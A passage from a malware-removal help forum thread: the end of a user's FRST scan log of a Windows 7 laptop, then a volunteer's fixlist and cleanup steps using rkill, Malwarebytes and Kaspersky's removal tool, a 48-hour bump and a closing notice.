2009-07-14 10:04 - 2014-09-13 00:30 - 00000027 ____A C:\windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0600C6CD-339E-40E5-837D-772661A93D2E} - System32\Tasks\{47BE60EA-15BF-417B-8455-8082DD3AA6C9} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0B0DCD61-E65B-41BD-87A5-E3FF4E52896D} - System32\Tasks\{2E3D8B46-8C0C-4CE5-BD72-9EA8BF2819A4} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0E809153-173D-4501-9AA3-E3299B8E4EEB} - System32\Tasks\{6446B742-20A7-4A87-91FB-1DAF36B20FDE} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {131204F4-96CD-4DA3-BE7A-816280B2F3AB} - System32\Tasks\{88F08FA9-BE71-4A64-979B-251F068C947A} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {3655B183-5D27-422D-9FD5-CB1638615759} - System32\Tasks\{35038549-A0E9-41DD-B0FC-39A9B0A1194D} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {48A8BE75-28FC-45FC-A2E4-BFBF99AB848F} - System32\Tasks\{E274B4A1-AFB4-49EA-BF80-7ACE438DC09F} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {67B5FCE5-D76F-44AC-A382-B1B5E874D085} - System32\Tasks\{3B5FF27F-F004-4707-A208-EAF4518D4AC7} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {69ACD1BB-0C0D-4370-BBB9-8E8D07A61169} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {77F07B0E-D155-4273-A665-FD20F9C0B9B7} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2010-02-23] (TOSHIBA CORPORATION)
Task: {81532BAB-54D1-4201-941B-AF6D56C850A4} - System32\Tasks\{F810B7E8-5B48-4A60-BF3B-7EED4E944DA3} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {8987DC76-A8B3-49B2-A0BB-072667F6A7AE} - System32\Tasks\{0443CAD0-DB77-4C07-86A1-3FE551E42396} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {976A4408-8F64-4C97-B073-CD2D16E60C09} - \{08BD5BC0-2D8E-7335-9F1F-3215372B580F} No Task File <==== ATTENTION
Task: {9ECA6E1B-A776-4C9B-B04A-A87D8E24AFAB} - System32\Tasks\{DC76CA08-A16E-427C-ABBC-3E5C759C3EA6} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {A264B53A-C76E-4EF8-A314-785501361D1E} - System32\Tasks\{9D54E60D-393D-4FD2-96B6-96A73B3AF2D9} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {B714418F-4FFB-4571-BE0E-0838A402499C} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-04-27] (Adobe Systems Incorporated)
Task: {CE67E4A0-0B09-4CF4-8D12-2080226E2384} - System32\Tasks\{928F0CFC-9063-46E2-BD07-C6585B0230DC} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {E331DF70-0764-4282-9BBA-EEB4DE041C73} - System32\Tasks\{F687F45B-D1DB-4FA4-BD38-ED30604C0A48} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
 
==================== Loaded Modules (whitelisted) =============
 
2006-12-04 01:25 - 2006-12-04 01:25 - 00022723 _____ () C:\windows\System32\sugs2l3.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 08783160 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-04 04:26 - 2009-11-04 04:26 - 00058680 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2009-03-13 10:08 - 2009-03-13 10:08 - 00049152 _____ () C:\Program Files\Toshiba\PCDiag\NotifyPCD.dll
2009-07-26 02:07 - 2009-07-26 02:07 - 00058704 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2010-11-17 13:16 - 2010-11-17 13:16 - 00067872 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2009-10-14 01:00 - 2009-10-14 01:00 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-11-03 08:46 - 2010-11-03 08:46 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2013-01-11 18:27 - 2013-01-11 18:27 - 00172544 _____ () C:\windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\72d7ad1c7236c618e32950b49869a26b\IsdiInterop.ni.dll
2011-12-01 10:49 - 2011-10-17 15:08 - 00059904 _____ () C:\Program Files\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/13/2014 07:49:49 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies - Update 'Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (09/13/2014 07:49:49 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.
 
Error: (09/12/2014 09:49:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x16b4
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/12/2014 09:46:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: regsvr32.exe, version: 6.1.7600.16385, time stamp: 0x4a5bca28
Faulting module name: ntdll.dll, version: 6.1.7600.16915, time stamp: 0x4ec49caf
Exception code: 0xc0000029
Fault offset: 0x0008df89
Faulting process id: 0x1688
Faulting application start time: 0xregsvr32.exe0
Faulting application path: regsvr32.exe1
Faulting module path: regsvr32.exe2
Report Id: regsvr32.exe3
 
Error: (09/12/2014 09:46:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Explorer.EXE, version: 6.1.7600.16768, time stamp: 0x4d6878c3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0xffb4e0b3
Faulting process id: 0x8d0
Faulting application start time: 0xExplorer.EXE0
Faulting application path: Explorer.EXE1
Faulting module path: Explorer.EXE2
Report Id: Explorer.EXE3
 
Error: (09/12/2014 09:38:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc6
Faulting process id: 0x594
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/12/2014 09:06:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x15cc
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies - Update 'Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.
 
Error: (09/11/2014 07:01:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x176c
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
 
System errors:
=============
Error: (09/13/2014 08:47:43 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 08:45:50 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 08:42:36 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 08:28:33 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x8024200d: Windows 7 Service Pack 1 (KB976932).
 
Error: (09/13/2014 08:16:40 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/13/2014 08:07:50 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x8024200d: Windows 7 Service Pack 1 (KB976932).
 
Error: (09/13/2014 07:49:56 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Microsoft Office PowerPoint 2007 (KB2596764).
 
Error: (09/13/2014 00:30:43 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 00:21:20 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 00:14:46 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
 
Microsoft Office Sessions:
=========================
Error: (09/13/2014 07:49:49 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Microsoft Office 2007 Primary Interop AssembliesSecurity Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition1603(NULL)(NULL)(NULL)
 
Error: (09/13/2014 07:49:49 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (09/12/2014 09:49:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc916b401cfce2a5e91c3e8C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllfb2c76e5-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:46:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: regsvr32.exe6.1.7600.163854a5bca28ntdll.dll6.1.7600.169154ec49cafc00000290008df89168801cfce2b501bf5d6C:\windows\system32\regsvr32.exeC:\windows\SYSTEM32\ntdll.dll949944e1-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:46:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Explorer.EXE6.1.7600.167684d6878c3unknown0.0.0.000000000c0000005ffb4e0b38d001cfce1e5f8c4d59C:\windows\Explorer.EXEunknown8fe7ca2a-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:38:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc659401cfce25c25dfa46C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll7c87949c-3a1d-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:06:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc915cc01cfce1ec62e079cC:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllf70bd7ca-3a18-11e4-8580-4cedde1b1e7f
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Microsoft Office 2007 Primary Interop AssembliesSecurity Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition1603(NULL)(NULL)(NULL)
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (09/11/2014 07:01:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc9176c01cfcdadc8bc3834C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll04b32946-39a3-11e4-aa00-00266c867412
 
 
CodeIntegrity Errors:
===================================
  Date: 2011-12-21 08:59:48.259
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.229
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.179
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.139
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.049
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.999
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.959
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.869
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Percentage of memory in use: 42%
Total physical RAM: 3061.86 MB
Available physical RAM: 1759.14 MB
Total Pagefile: 6122 MB
Available Pagefile: 4757.23 MB
Total Virtual: 2047.88 MB
Available Virtual: 1887.62 MB
 
==================== Drives ================================
 
Drive c: (S3A8572D009) (Fixed) (Total:583.02 GB) (Free:546.43 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: () (Removable) (Total:7.45 GB) (Free:4.98 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 596.2 GB) (Disk ID: 9BD1B9BA)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=583 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=17)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#11 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 13 September 2014 - 03:53 PM

Hi tantryl,

 

Perform the following procedure.

 

Step 1:

 

Run FRST fixlist

 

Please open notepad (Start > All Programs > Accessories > Notepad)
Copy the entire contents of the code box below (Do not copy the word 'code') to Notepad.
Save it to the Desktop, and name it: fixlist.txt

Task: {976A4408-8F64-4C97-B073-CD2D16E60C09} - \{08BD5BC0-2D8E-7335-9F1F-3215372B580F} No Task File <==== ATTENTION
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty

NOTICE: This script is written specifically for this computer!!!
Running this on another computer may cause damage to the Operating System.

Now, please run FRST, and press the Fix button, just once, and wait.

When done, the tool creates a report on the Desktop called: Fixlog.txt

>> Please post the Fixlog.txt in your reply.

 

Step 2:

 

Please try again run rkill and MalwareBytes in safe mode.

Safe Mode with Networking :

  • Restart your computer.
  • After hearing your computer beep once during startup, but before the Windows icon appears, start pressing the F8 key.
  • In some systems, this may be the F5 key.
  • Instead of Windows loading as normal, a menu should appear.
  • Use the up arrow key to highlight Safe Mode with Networking and press 'Enter'.
  • Login on your usual account.

 

Step 3:

 

Please download the Kaspersky Virus Removal Tool from here to your Desktop.

Double-click the Removal Tool.
Click the cog in the upper right corner:

AVPfront.gif

Select down to and including your main drive.
Once done please select the Automatic Scan tab and press Start Scan.

avpsettings.gif

Allow AVP to delete all infections found.
Once it has finished select the Report tab.
Select the Detected threats report from the left and press the Save button.
Save it to your Desktop and post the contents in your next reply.

 

-----------------

 

How is it now browsers and the system ?

 

 

Best regards.

 

 

 


Best regards
 
paypal.gif
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#12 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 15 September 2014 - 06:24 AM

48 Hour bump

It has been more than 48 hours since my last post.

  • do you still need help with this?
  • do you need more time?
  • are you having problems following my instructions?
  • if after 48hrs you have not replied to this thread then it will have to be closed!

Best regards
 
paypal.gif
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#13 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 18 September 2014 - 06:34 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

Best regards
 
paypal.gif
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users